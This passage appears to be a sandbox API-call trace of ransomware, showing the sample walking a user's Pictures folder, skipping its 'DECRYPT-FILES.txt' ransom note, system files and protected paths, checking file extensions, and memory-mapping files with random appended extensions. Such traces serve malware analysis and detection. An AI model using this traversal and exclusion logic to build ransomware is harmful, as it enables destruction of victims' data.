lpString2="DECRYPT-FILES.txt") returned 0 [0186.009] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.009] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.009] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.009] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.009] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.009] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f259f80, ftCreationTime.dwHighDateTime=0x1d4d132, ftLastAccessTime.dwLowDateTime=0x5e9897c0, ftLastAccessTime.dwHighDateTime=0x1d4ce93, ftLastWriteTime.dwLowDateTime=0xaf7f4c40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x177e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IQYZN 7s2p1.png.S2RnU", cAlternateFileName="IQYZN7~1.S2R")) returned 1 [0186.009] lstrcmpiW (lpString1="IQYZN 7s2p1.png.S2RnU", lpString2="DECRYPT-FILES.txt") returned 1 [0186.009] lstrcmpiW (lpString1="IQYZN 7s2p1.png.S2RnU", lpString2="autorun.inf") returned 1 [0186.009] lstrcmpiW (lpString1="IQYZN 7s2p1.png.S2RnU", lpString2="boot.ini") returned 1 [0186.009] lstrcmpiW (lpString1="IQYZN 7s2p1.png.S2RnU", lpString2="desktop.ini") returned 1 [0186.009] lstrcmpiW (lpString1="IQYZN 7s2p1.png.S2RnU", lpString2="ntuser.dat") returned -1 [0186.009] lstrcmpiW (lpString1="IQYZN 7s2p1.png.S2RnU", lpString2="iconcache.db") returned 1 [0186.009] lstrcmpiW (lpString1="IQYZN 7s2p1.png.S2RnU", lpString2="bootsect.bak") returned 1 [0186.009] lstrcmpiW (lpString1="IQYZN 7s2p1.png.S2RnU", lpString2="ntuser.dat.log") returned -1 [0186.010] lstrcmpiW (lpString1="IQYZN 7s2p1.png.S2RnU", lpString2="thumbs.db") returned -1 [0186.010] lstrcmpiW (lpString1="IQYZN 7s2p1.png.S2RnU", lpString2="Bootfont.bin") returned 1 [0186.010] lstrlenW (lpString="IQYZN 7s2p1.png.S2RnU") returned 21 [0186.010] lstrcmpiW (lpString1="S2RnU", lpString2="lnk") returned 1 [0186.010] lstrcmpiW (lpString1="S2RnU", lpString2="exe") returned 1 [0186.010] lstrcmpiW (lpString1="S2RnU", lpString2="sys") returned -1 [0186.010] lstrcmpiW (lpString1="S2RnU", lpString2="dll") returned 1 [0186.010] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0186.010] lstrlenW (lpString="IQYZN 7s2p1.png.S2RnU") returned 21 [0186.010] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0186.010] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="IQYZN 7s2p1.png.S2RnU" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IQYZN 7s2p1.png.S2RnU") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IQYZN 7s2p1.png.S2RnU" [0186.010] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.010] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IQYZN 7s2p1.png.S2RnU" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iqyzn 7s2p1.png.s2rnu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.010] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=96233) returned 1 [0186.010] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.011] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.011] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.011] CloseHandle (hObject=0x260) returned 1 [0186.011] CloseHandle (hObject=0x25c) returned 1 [0186.011] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.012] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x268ba1a0, ftCreationTime.dwHighDateTime=0x1d4ca70, ftLastAccessTime.dwLowDateTime=0xafc6b580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xafc6b580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nTwgr", cAlternateFileName="")) returned 1 [0186.012] lstrcmpW (lpString1="nTwgr", lpString2=".") returned 1 [0186.012] lstrcmpW (lpString1="nTwgr", lpString2="..") returned 1 [0186.012] lstrcatW (in: lpString1="nTwgr", lpString2="\\" | out: lpString1="nTwgr\\") returned="nTwgr\\" [0186.012] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\Program Files") returned 0x0 [0186.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch=":\\Windows") returned 0x0 [0186.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\Games\\") returned 0x0 [0186.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\All Users") returned 0x0 [0186.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="AhnLab") returned 0x0 [0186.012] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.012] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.012] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.012] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\\\0a16c9.tmp") returned 56 [0186.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0186.014] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.014] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.014] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\\\DECRYPT-FILES.txt") returned 63 [0186.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.014] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.014] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\*" [0186.015] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x268ba1a0, ftCreationTime.dwHighDateTime=0x1d4ca70, ftLastAccessTime.dwLowDateTime=0xf19459e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf19459e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0186.015] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.015] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x268ba1a0, ftCreationTime.dwHighDateTime=0x1d4ca70, ftLastAccessTime.dwLowDateTime=0xf19459e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf19459e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.015] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.015] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.015] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf19459e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf19459e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf19459e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.015] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.015] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.015] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.015] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.015] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.015] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.016] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.016] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.016] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.016] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.016] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.016] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.016] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.016] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.016] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.016] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.016] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.016] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.016] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\0a16c9.tmp" [0186.016] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.016] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.016] CloseHandle (hObject=0x0) returned 0 [0186.016] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.016] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86d52360, ftCreationTime.dwHighDateTime=0x1d4c69c, ftLastAccessTime.dwLowDateTime=0x21347670, ftLastAccessTime.dwHighDateTime=0x1d4cc85, ftLastWriteTime.dwLowDateTime=0xaf840f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xbe56, dwReserved0=0x0, dwReserved1=0x0, cFileName="5H FrCvTzwDbhSv2_.jpg.qzb3p6", cAlternateFileName="5HFRCV~1.QZB")) returned 1 [0186.017] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg.qzb3p6", lpString2="DECRYPT-FILES.txt") returned -1 [0186.017] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg.qzb3p6", lpString2="autorun.inf") returned -1 [0186.017] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg.qzb3p6", lpString2="boot.ini") returned -1 [0186.017] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg.qzb3p6", lpString2="desktop.ini") returned -1 [0186.017] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg.qzb3p6", lpString2="ntuser.dat") returned -1 [0186.017] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg.qzb3p6", lpString2="iconcache.db") returned -1 [0186.017] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg.qzb3p6", lpString2="bootsect.bak") returned -1 [0186.017] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg.qzb3p6", lpString2="ntuser.dat.log") returned -1 [0186.017] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg.qzb3p6", lpString2="thumbs.db") returned -1 [0186.017] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg.qzb3p6", lpString2="Bootfont.bin") returned -1 [0186.017] lstrlenW (lpString="5H FrCvTzwDbhSv2_.jpg.qzb3p6") returned 28 [0186.017] lstrcmpiW (lpString1="qzb3p6", lpString2="lnk") returned 1 [0186.017] lstrcmpiW (lpString1="qzb3p6", lpString2="exe") returned 1 [0186.017] lstrcmpiW (lpString1="qzb3p6", lpString2="sys") returned -1 [0186.017] lstrcmpiW (lpString1="qzb3p6", lpString2="dll") returned 1 [0186.017] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.017] lstrlenW (lpString="5H FrCvTzwDbhSv2_.jpg.qzb3p6") returned 28 [0186.017] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.017] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="5H FrCvTzwDbhSv2_.jpg.qzb3p6" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\5H FrCvTzwDbhSv2_.jpg.qzb3p6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\5H FrCvTzwDbhSv2_.jpg.qzb3p6" [0186.017] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.017] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\5H FrCvTzwDbhSv2_.jpg.qzb3p6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\5h frcvtzwdbhsv2_.jpg.qzb3p6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.019] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=48726) returned 1 [0186.019] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.019] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.019] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.019] CloseHandle (hObject=0x268) returned 1 [0186.020] CloseHandle (hObject=0x264) returned 1 [0186.020] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.020] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6c7df30, ftCreationTime.dwHighDateTime=0x1d4d020, ftLastAccessTime.dwLowDateTime=0x406f99e0, ftLastAccessTime.dwHighDateTime=0x1d4cc51, ftLastWriteTime.dwLowDateTime=0xaf867060, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x6aa5, dwReserved0=0x0, dwReserved1=0x0, cFileName="6pqbaFAB59 bjsw9TrUE.png.1pRCoQE", cAlternateFileName="6PQBAF~1.1PR")) returned 1 [0186.020] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png.1pRCoQE", lpString2="DECRYPT-FILES.txt") returned -1 [0186.020] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png.1pRCoQE", lpString2="autorun.inf") returned -1 [0186.020] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png.1pRCoQE", lpString2="boot.ini") returned -1 [0186.020] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png.1pRCoQE", lpString2="desktop.ini") returned -1 [0186.020] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png.1pRCoQE", lpString2="ntuser.dat") returned -1 [0186.020] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png.1pRCoQE", lpString2="iconcache.db") returned -1 [0186.020] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png.1pRCoQE", lpString2="bootsect.bak") returned -1 [0186.020] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png.1pRCoQE", lpString2="ntuser.dat.log") returned -1 [0186.020] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png.1pRCoQE", lpString2="thumbs.db") returned -1 [0186.020] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.png.1pRCoQE", lpString2="Bootfont.bin") returned -1 [0186.020] lstrlenW (lpString="6pqbaFAB59 bjsw9TrUE.png.1pRCoQE") returned 32 [0186.020] lstrcmpiW (lpString1="1pRCoQE", lpString2="lnk") returned -1 [0186.020] lstrcmpiW (lpString1="1pRCoQE", lpString2="exe") returned -1 [0186.020] lstrcmpiW (lpString1="1pRCoQE", lpString2="sys") returned -1 [0186.020] lstrcmpiW (lpString1="1pRCoQE", lpString2="dll") returned -1 [0186.020] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.020] lstrlenW (lpString="6pqbaFAB59 bjsw9TrUE.png.1pRCoQE") returned 32 [0186.020] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.020] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="6pqbaFAB59 bjsw9TrUE.png.1pRCoQE" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\6pqbaFAB59 bjsw9TrUE.png.1pRCoQE") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\6pqbaFAB59 bjsw9TrUE.png.1pRCoQE" [0186.020] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.021] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\6pqbaFAB59 bjsw9TrUE.png.1pRCoQE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\6pqbafab59 bjsw9true.png.1prcoqe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.021] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=27301) returned 1 [0186.021] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.021] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.022] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.022] CloseHandle (hObject=0x268) returned 1 [0186.022] CloseHandle (hObject=0x264) returned 1 [0186.022] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.022] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4ee8860, ftCreationTime.dwHighDateTime=0x1d4d4fb, ftLastAccessTime.dwLowDateTime=0x1fa0a480, ftLastAccessTime.dwHighDateTime=0x1d4cf4d, ftLastWriteTime.dwLowDateTime=0xaf8b3320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x14ff0, dwReserved0=0x0, dwReserved1=0x0, cFileName="avtMZ-q0LNqQWL.png.4Rj4", cAlternateFileName="AVTMZ-~1.4RJ")) returned 1 [0186.022] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png.4Rj4", lpString2="DECRYPT-FILES.txt") returned -1 [0186.022] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png.4Rj4", lpString2="autorun.inf") returned 1 [0186.022] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png.4Rj4", lpString2="boot.ini") returned -1 [0186.022] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png.4Rj4", lpString2="desktop.ini") returned -1 [0186.022] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png.4Rj4", lpString2="ntuser.dat") returned -1 [0186.022] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png.4Rj4", lpString2="iconcache.db") returned -1 [0186.022] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png.4Rj4", lpString2="bootsect.bak") returned -1 [0186.022] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png.4Rj4", lpString2="ntuser.dat.log") returned -1 [0186.022] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png.4Rj4", lpString2="thumbs.db") returned -1 [0186.022] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png.4Rj4", lpString2="Bootfont.bin") returned -1 [0186.022] lstrlenW (lpString="avtMZ-q0LNqQWL.png.4Rj4") returned 23 [0186.022] lstrcmpiW (lpString1="4Rj4", lpString2="lnk") returned -1 [0186.023] lstrcmpiW (lpString1="4Rj4", lpString2="exe") returned -1 [0186.023] lstrcmpiW (lpString1="4Rj4", lpString2="sys") returned -1 [0186.023] lstrcmpiW (lpString1="4Rj4", lpString2="dll") returned -1 [0186.023] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.023] lstrlenW (lpString="avtMZ-q0LNqQWL.png.4Rj4") returned 23 [0186.023] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.023] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="avtMZ-q0LNqQWL.png.4Rj4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\avtMZ-q0LNqQWL.png.4Rj4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\avtMZ-q0LNqQWL.png.4Rj4" [0186.023] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 